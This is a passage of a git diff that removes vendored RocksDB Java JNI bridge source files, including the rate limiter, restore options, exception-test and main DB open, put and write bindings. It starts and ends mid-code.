-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-      rocksdb::Slice value_slice(reinterpret_cast<char*>(value),
-          jentry_value_len);
-
-      op(key_slice, value_slice);
-
-      if(value != nullptr) {
-        env->ReleaseByteArrayElements(jentry_value, value, JNI_ABORT);
-      }
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-    }
-
-    /*
-     * Helper for operations on a key
-     * for example WriteBatch->Delete
-     *
-     * TODO(AR) could be extended to cover returning rocksdb::Status
-     * from `op` and used for RocksDB->Delete etc.
-     */
-    static void k_op(
-        std::function<void(rocksdb::Slice)> op,
-        JNIEnv* env, jobject jobj,
-        jbyteArray jkey, jint jkey_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return;
-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-      op(key_slice);
-
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-    }
-
-    /*
-     * Helper for operations on a value
-     * for example WriteBatchWithIndex->GetFromBatch
-     */
-    static jbyteArray v_op(
-        std::function<rocksdb::Status(rocksdb::Slice, std::string*)> op,
-        JNIEnv* env, jbyteArray jkey, jint jkey_len) {
-      jbyte* key = env->GetByteArrayElements(jkey, nullptr);
-      if(env->ExceptionCheck()) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-      std::string value;
-      rocksdb::Status s = op(key_slice, &value);
-
-      if(key != nullptr) {
-        env->ReleaseByteArrayElements(jkey, key, JNI_ABORT);
-      }
-
-      if (s.IsNotFound()) {
-        return nullptr;
-      }
-
-      if (s.ok()) {
-        jbyteArray jret_value =
-            env->NewByteArray(static_cast<jsize>(value.size()));
-        if(jret_value == nullptr) {
-          // exception thrown: OutOfMemoryError
-          return nullptr;
-        }
-
-        env->SetByteArrayRegion(jret_value, 0, static_cast<jsize>(value.size()),
-                                const_cast<jbyte*>(reinterpret_cast<const jbyte*>(value.c_str())));
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          if(jret_value != nullptr) {
-            env->DeleteLocalRef(jret_value);
-          }
-          return nullptr;
-        }
-
-        return jret_value;
-      }
-
-      rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-      return nullptr;
-    }
-};
-
-}  // namespace rocksdb
-#endif  // JAVA_ROCKSJNI_PORTAL_H_
diff --git a/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc b/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc
deleted file mode 100644
index b4174ff..0000000
--- a/thirdparty/rocksdb/java/rocksjni/ratelimiterjni.cc
+++ /dev/null
@@ -1,96 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ for RateLimiter.
-
-#include "rocksjni/portal.h"
-#include "include/org_rocksdb_RateLimiter.h"
-#include "rocksdb/rate_limiter.h"
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    newRateLimiterHandle
- * Signature: (JJI)J
- */
-jlong Java_org_rocksdb_RateLimiter_newRateLimiterHandle(
-    JNIEnv* env, jclass jclazz, jlong jrate_bytes_per_second,
-    jlong jrefill_period_micros, jint jfairness) {
-  auto * sptr_rate_limiter =
-      new std::shared_ptr<rocksdb::RateLimiter>(rocksdb::NewGenericRateLimiter(
-          static_cast<int64_t>(jrate_bytes_per_second),
-          static_cast<int64_t>(jrefill_period_micros),
-          static_cast<int32_t>(jfairness)));
-
-  return reinterpret_cast<jlong>(sptr_rate_limiter);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RateLimiter_disposeInternal(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* handle =
-      reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(jhandle);
-  delete handle;  // delete std::shared_ptr
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    setBytesPerSecond
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RateLimiter_setBytesPerSecond(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jlong jbytes_per_second) {
-  reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->get()->
-      SetBytesPerSecond(jbytes_per_second);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    request
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_RateLimiter_request(
-    JNIEnv* env, jobject jobj, jlong handle,
-    jlong jbytes) {
-  reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->get()->
-      Request(jbytes, rocksdb::Env::IO_TOTAL);
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getSingleBurstBytes
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getSingleBurstBytes(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetSingleBurstBytes();
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getTotalBytesThrough
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getTotalBytesThrough(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetTotalBytesThrough();
-}
-
-/*
- * Class:     org_rocksdb_RateLimiter
- * Method:    getTotalRequests
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_RateLimiter_getTotalRequests(
-    JNIEnv* env, jobject jobj, jlong handle) {
-  return reinterpret_cast<std::shared_ptr<rocksdb::RateLimiter> *>(handle)->
-      get()->GetTotalRequests();
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc b/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc
deleted file mode 100644
index 8c54a46..0000000
--- a/thirdparty/rocksdb/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc
+++ /dev/null
@@ -1,24 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_RemoveEmptyValueCompactionFilter.h"
-#include "utilities/compaction_filters/remove_emptyvalue_compactionfilter.h"
-
-
-/*
- * Class:     org_rocksdb_RemoveEmptyValueCompactionFilter
- * Method:    createNewRemoveEmptyValueCompactionFilter0
- * Signature: ()J
- */
-jlong Java_org_rocksdb_RemoveEmptyValueCompactionFilter_createNewRemoveEmptyValueCompactionFilter0(
-    JNIEnv* env, jclass jcls) {
-  auto* compaction_filter =
-      new rocksdb::RemoveEmptyValueCompactionFilter();
-
-  // set the native handle to our native compaction filter
-  return reinterpret_cast<jlong>(compaction_filter);
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/restorejni.cc b/thirdparty/rocksdb/java/rocksjni/restorejni.cc
deleted file mode 100644
index eb8e65b..0000000
--- a/thirdparty/rocksdb/java/rocksjni/restorejni.cc
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling C++ rocksdb::RestoreOptions methods
-// from Java side.
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <jni.h>
-#include <string>
-
-#include "include/org_rocksdb_RestoreOptions.h"
-#include "rocksjni/portal.h"
-#include "rocksdb/utilities/backupable_db.h"
-/*
- * Class:     org_rocksdb_RestoreOptions
- * Method:    newRestoreOptions
- * Signature: (Z)J
- */
-jlong Java_org_rocksdb_RestoreOptions_newRestoreOptions(JNIEnv* env,
-    jclass jcls, jboolean keep_log_files) {
-  auto* ropt = new rocksdb::RestoreOptions(keep_log_files);
-  return reinterpret_cast<jlong>(ropt);
-}
-
-/*
- * Class:     org_rocksdb_RestoreOptions
- * Method:    disposeInternal
- * Signature: (J)V
- */
-void Java_org_rocksdb_RestoreOptions_disposeInternal(JNIEnv* env, jobject jobj,
-    jlong jhandle) {
-  auto* ropt = reinterpret_cast<rocksdb::RestoreOptions*>(jhandle);
-  assert(ropt);
-  delete ropt;
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc b/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc
deleted file mode 100644
index 339d4c5..0000000
--- a/thirdparty/rocksdb/java/rocksjni/rocksdb_exception_test.cc
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <jni.h>
-
-#include "include/org_rocksdb_RocksDBExceptionTest.h"
-
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksjni/portal.h"
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseException
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseException(JNIEnv* env,
-                                                          jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, std::string("test message"));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, "test message",
-                                         rocksdb::Status::NotSupported());
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionNoMsgWithStatusCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionNoMsgWithStatusCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, rocksdb::Status::NotSupported());
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCodeSubCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCodeSubCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(
-      env, "test message",
-      rocksdb::Status::TimedOut(rocksdb::Status::SubCode::kLockTimeout));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionNoMsgWithStatusCodeSubCode
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionNoMsgWithStatusCodeSubCode(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::RocksDBExceptionJni::ThrowNew(
-      env, rocksdb::Status::TimedOut(rocksdb::Status::SubCode::kLockTimeout));
-}
-
-/*
- * Class:     org_rocksdb_RocksDBExceptionTest
- * Method:    raiseExceptionWithStatusCodeState
- * Signature: ()V
- */
-void Java_org_rocksdb_RocksDBExceptionTest_raiseExceptionWithStatusCodeState(
-    JNIEnv* env, jobject jobj) {
-  rocksdb::Slice state("test state");
-  rocksdb::RocksDBExceptionJni::ThrowNew(env, "test message",
-                                         rocksdb::Status::NotSupported(state));
-}
diff --git a/thirdparty/rocksdb/java/rocksjni/rocksjni.cc b/thirdparty/rocksdb/java/rocksjni/rocksjni.cc
deleted file mode 100644
index a08a459..0000000
--- a/thirdparty/rocksdb/java/rocksjni/rocksjni.cc
+++ /dev/null
@@ -1,2198 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the "bridge" between Java and C++ and enables
-// calling c++ rocksdb::DB methods from Java side.
-
-#include <jni.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <functional>
-#include <memory>
-#include <string>
-#include <tuple>
-#include <vector>
-
-#include "include/org_rocksdb_RocksDB.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/types.h"
-#include "rocksjni/portal.h"
-
-#ifdef min
-#undef min
-#endif
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Open
-jlong rocksdb_open_helper(JNIEnv* env, jlong jopt_handle, jstring jdb_path,
-    std::function<rocksdb::Status(
-      const rocksdb::Options&, const std::string&, rocksdb::DB**)> open_fn
-    ) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return 0;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jopt_handle);
-  rocksdb::DB* db = nullptr;
-  rocksdb::Status s = open_fn(*opt, db_path, &db);
-
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  if (s.ok()) {
-    return reinterpret_cast<jlong>(db);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return 0;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    open
- * Signature: (JLjava/lang/String;)J
- */
-jlong Java_org_rocksdb_RocksDB_open__JLjava_lang_String_2(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path,
-    (rocksdb::Status(*)
-      (const rocksdb::Options&, const std::string&, rocksdb::DB**)
-    )&rocksdb::DB::Open
-  );
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    openROnly
- * Signature: (JLjava/lang/String;)J
- */
-jlong Java_org_rocksdb_RocksDB_openROnly__JLjava_lang_String_2(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, [](
-      const rocksdb::Options& options,
-      const std::string& db_path, rocksdb::DB** db) {
-    return rocksdb::DB::OpenForReadOnly(options, db_path, db);
-  });
-}
-
-jlongArray rocksdb_open_helper(JNIEnv* env, jlong jopt_handle,
-    jstring jdb_path, jobjectArray jcolumn_names, jlongArray jcolumn_options,
-    std::function<rocksdb::Status(
-      const rocksdb::DBOptions&, const std::string&,
-      const std::vector<rocksdb::ColumnFamilyDescriptor>&,
-      std::vector<rocksdb::ColumnFamilyHandle*>*,
-      rocksdb::DB**)> open_fn
-    ) {
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  const jsize len_cols = env->GetArrayLength(jcolumn_names);
-  jlong* jco = env->GetLongArrayElements(jcolumn_options, nullptr);
-  if(jco == nullptr) {
-    // exception thrown: OutOfMemoryError
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> column_families;
-  jboolean has_exception = JNI_FALSE;
-  rocksdb::JniUtil::byteStrings<std::string>(
-    env,
-    jcolumn_names,
-    [](const char* str_data, const size_t str_len) {
-      return std::string(str_data, str_len);
-    },
-    [&jco, &column_families](size_t idx, std::string cf_name) {
-      rocksdb::ColumnFamilyOptions* cf_options =
-          reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jco[idx]);
-      column_families.push_back(
-          rocksdb::ColumnFamilyDescriptor(cf_name, *cf_options));
-    },
-    &has_exception);
-
-  env->ReleaseLongArrayElements(jcolumn_options, jco, JNI_ABORT);
-
-  if(has_exception == JNI_TRUE) {
-    // exception occurred
-    env->ReleaseStringUTFChars(jdb_path, db_path);
-    return nullptr;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::DBOptions*>(jopt_handle);
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  rocksdb::DB* db = nullptr;
-  rocksdb::Status s = open_fn(*opt, db_path, column_families,
-      &handles, &db);
-
-  // we have now finished with db_path
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  // check if open operation was successful
-  if (s.ok()) {
-    const jsize resultsLen = 1 + len_cols; //db handle + column family handles
-    std::unique_ptr<jlong[]> results =
-        std::unique_ptr<jlong[]>(new jlong[resultsLen]);
-    results[0] = reinterpret_cast<jlong>(db);
-    for(int i = 1; i <= len_cols; i++) {
-      results[i] = reinterpret_cast<jlong>(handles[i - 1]);
-    }
-
-    jlongArray jresults = env->NewLongArray(resultsLen);
-    if(jresults == nullptr) {
-      // exception thrown: OutOfMemoryError
-      return nullptr;
-    }
-
-    env->SetLongArrayRegion(jresults, 0, resultsLen, results.get());
-    if(env->ExceptionCheck()) {
-      // exception thrown: ArrayIndexOutOfBoundsException
-      env->DeleteLocalRef(jresults);
-      return nullptr;
-    }
-
-    return jresults;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return nullptr;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    openROnly
- * Signature: (JLjava/lang/String;[[B[J)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_openROnly__JLjava_lang_String_2_3_3B_3J(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, jcolumn_names,
-    jcolumn_options, [](
-        const rocksdb::DBOptions& options, const std::string& db_path,
-        const std::vector<rocksdb::ColumnFamilyDescriptor>& column_families,
-        std::vector<rocksdb::ColumnFamilyHandle*>* handles, rocksdb::DB** db) {
-      return rocksdb::DB::OpenForReadOnly(options, db_path, column_families,
-        handles, db);
-  });
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    open
- * Signature: (JLjava/lang/String;[[B[J)[J
- */
-jlongArray Java_org_rocksdb_RocksDB_open__JLjava_lang_String_2_3_3B_3J(
-    JNIEnv* env, jclass jcls, jlong jopt_handle, jstring jdb_path,
-    jobjectArray jcolumn_names, jlongArray jcolumn_options) {
-  return rocksdb_open_helper(env, jopt_handle, jdb_path, jcolumn_names,
-    jcolumn_options, (rocksdb::Status(*)
-      (const rocksdb::DBOptions&, const std::string&,
-        const std::vector<rocksdb::ColumnFamilyDescriptor>&,
-        std::vector<rocksdb::ColumnFamilyHandle*>*, rocksdb::DB**)
-      )&rocksdb::DB::Open
-    );
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::ListColumnFamilies
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    listColumnFamilies
- * Signature: (JLjava/lang/String;)[[B
- */
-jobjectArray Java_org_rocksdb_RocksDB_listColumnFamilies(
-    JNIEnv* env, jclass jclazz, jlong jopt_handle, jstring jdb_path) {
-  std::vector<std::string> column_family_names;
-  const char* db_path = env->GetStringUTFChars(jdb_path, nullptr);
-  if(db_path == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  auto* opt = reinterpret_cast<rocksdb::Options*>(jopt_handle);
-  rocksdb::Status s = rocksdb::DB::ListColumnFamilies(*opt, db_path,
-      &column_family_names);
-
-  env->ReleaseStringUTFChars(jdb_path, db_path);
-
-  jobjectArray jcolumn_family_names =
-      rocksdb::JniUtil::stringsBytes(env, column_family_names);
-
-  return jcolumn_family_names;
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Put
-
-/**
- * @return true if the put succeeded, false if a Java Exception was thrown
- */
-bool rocksdb_put_helper(JNIEnv* env, rocksdb::DB* db,
-                        const rocksdb::WriteOptions& write_options,
-                        rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey,
-                        jint jkey_off, jint jkey_len, jbyteArray jval,
-                        jint jval_off, jint jval_len) {
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    return false;
-  }
-
-  jbyte* value = new jbyte[jval_len];
-  env->GetByteArrayRegion(jval, jval_off, jval_len, value);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] value;
-    delete [] key;
-    return false;
-  }
-
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-  rocksdb::Slice value_slice(reinterpret_cast<char*>(value), jval_len);
-
-  rocksdb::Status s;
-  if (cf_handle != nullptr) {
-    s = db->Put(write_options, cf_handle, key_slice, value_slice);
-  } else {
-    // backwards compatibility
-    s = db->Put(write_options, key_slice, value_slice);
-  }
-
-  // cleanup
-  delete [] value;
-  delete [] key;
-
-  if (s.ok()) {
-    return true;
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-    return false;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (J[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_put__J_3BII_3BII(JNIEnv* env, jobject jdb,
-                                               jlong jdb_handle,
-                                               jbyteArray jkey, jint jkey_off,
-                                               jint jkey_len, jbyteArray jval,
-                                               jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-
-  rocksdb_put_helper(env, db, default_write_options, nullptr, jkey, jkey_off,
-                     jkey_len, jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (J[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_put__J_3BII_3BIIJ(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len,
-                                                jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  static const rocksdb::WriteOptions default_write_options =
-      rocksdb::WriteOptions();
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_put_helper(env, db, default_write_options, cf_handle, jkey,
-                       jkey_off, jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (JJ[BII[BII)V
- */
-void Java_org_rocksdb_RocksDB_put__JJ_3BII_3BII(JNIEnv* env, jobject jdb,
-                                                jlong jdb_handle,
-                                                jlong jwrite_options_handle,
-                                                jbyteArray jkey, jint jkey_off,
-                                                jint jkey_len, jbyteArray jval,
-                                                jint jval_off, jint jval_len) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-
-  rocksdb_put_helper(env, db, *write_options, nullptr, jkey, jkey_off, jkey_len,
-                     jval, jval_off, jval_len);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    put
- * Signature: (JJ[BII[BIIJ)V
- */
-void Java_org_rocksdb_RocksDB_put__JJ_3BII_3BIIJ(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jwrite_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jbyteArray jval,
-    jint jval_off, jint jval_len, jlong jcf_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(jcf_handle);
-  if (cf_handle != nullptr) {
-    rocksdb_put_helper(env, db, *write_options, cf_handle, jkey, jkey_off,
-                       jkey_len, jval, jval_off, jval_len);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::Write
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    write0
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_write0(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options_handle, jlong jwb_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* wb = reinterpret_cast<rocksdb::WriteBatch*>(jwb_handle);
-
-  rocksdb::Status s = db->Write(*write_options, wb);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    write1
- * Signature: (JJJ)V
- */
-void Java_org_rocksdb_RocksDB_write1(
-    JNIEnv* env, jobject jdb, jlong jdb_handle,
-    jlong jwrite_options_handle, jlong jwbwi_handle) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* write_options = reinterpret_cast<rocksdb::WriteOptions*>(
-      jwrite_options_handle);
-  auto* wbwi = reinterpret_cast<rocksdb::WriteBatchWithIndex*>(jwbwi_handle);
-  auto* wb = wbwi->GetWriteBatch();
-
-  rocksdb::Status s = db->Write(*write_options, wb);
-
-  if (!s.ok()) {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env, s);
-  }
-}
-
-//////////////////////////////////////////////////////////////////////////////
-// rocksdb::DB::KeyMayExist
-jboolean key_may_exist_helper(JNIEnv* env, rocksdb::DB* db,
-    const rocksdb::ReadOptions& read_opt,
-    rocksdb::ColumnFamilyHandle* cf_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jobject jstring_builder, bool* has_exception) {
-
-  jbyte* key = new jbyte[jkey_len];
-  env->GetByteArrayRegion(jkey, jkey_off, jkey_len, key);
-  if(env->ExceptionCheck()) {
-    // exception thrown: ArrayIndexOutOfBoundsException
-    delete [] key;
-    *has_exception = true;
-    return false;
-  }
-
-  rocksdb::Slice key_slice(reinterpret_cast<char*>(key), jkey_len);
-
-  std::string value;
-  bool value_found = false;
-  bool keyMayExist;
-  if (cf_handle != nullptr) {
-    keyMayExist = db->KeyMayExist(read_opt, cf_handle, key_slice,
-        &value, &value_found);
-  } else {
-    keyMayExist = db->KeyMayExist(read_opt, key_slice,
-        &value, &value_found);
-  }
-
-  // cleanup
-  delete [] key;
-
-  // extract the value
-  if (value_found && !value.empty()) {
-    jobject jresult_string_builder =
-        rocksdb::StringBuilderJni::append(env, jstring_builder,
-            value.c_str());
-    if(jresult_string_builder == nullptr) {
-      *has_exception = true;
-      return false;
-    }
-  }
-
-  *has_exception = false;
-  return static_cast<jboolean>(keyMayExist);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (J[BIILjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__J_3BIILjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  bool has_exception = false;
-  return key_may_exist_helper(env, db, rocksdb::ReadOptions(),
-      nullptr, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (J[BIIJLjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__J_3BIIJLjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jbyteArray jkey, jint jkey_off,
-    jint jkey_len, jlong jcf_handle, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto* cf_handle = reinterpret_cast<rocksdb::ColumnFamilyHandle*>(
-      jcf_handle);
-  if (cf_handle != nullptr) {
-    bool has_exception = false;
-    return key_may_exist_helper(env, db, rocksdb::ReadOptions(),
-        cf_handle, jkey, jkey_off, jkey_len, jstring_builder, &has_exception);
-  } else {
-    rocksdb::RocksDBExceptionJni::ThrowNew(env,
-        rocksdb::Status::InvalidArgument("Invalid ColumnFamilyHandle."));
-    return true;
-  }
-}
-
-/*
- * Class:     org_rocksdb_RocksDB
- * Method:    keyMayExist
- * Signature: (JJ[BIILjava/lang/StringBuilder;)Z
- */
-jboolean Java_org_rocksdb_RocksDB_keyMayExist__JJ_3BIILjava_lang_StringBuilder_2(
-    JNIEnv* env, jobject jdb, jlong jdb_handle, jlong jread_options_handle,
-    jbyteArray jkey, jint jkey_off, jint jkey_len, jobject jstring_builder) {
-  auto* db = reinterpret_cast<rocksdb::DB*>(jdb_handle);
-  auto& read_options = *reinterpret_cast<rocksdb::ReadOptions*>(
-      jread_options_handle);
-  bool has_exception = false;
-  return key_may_exist_helper(env, db, read_options,
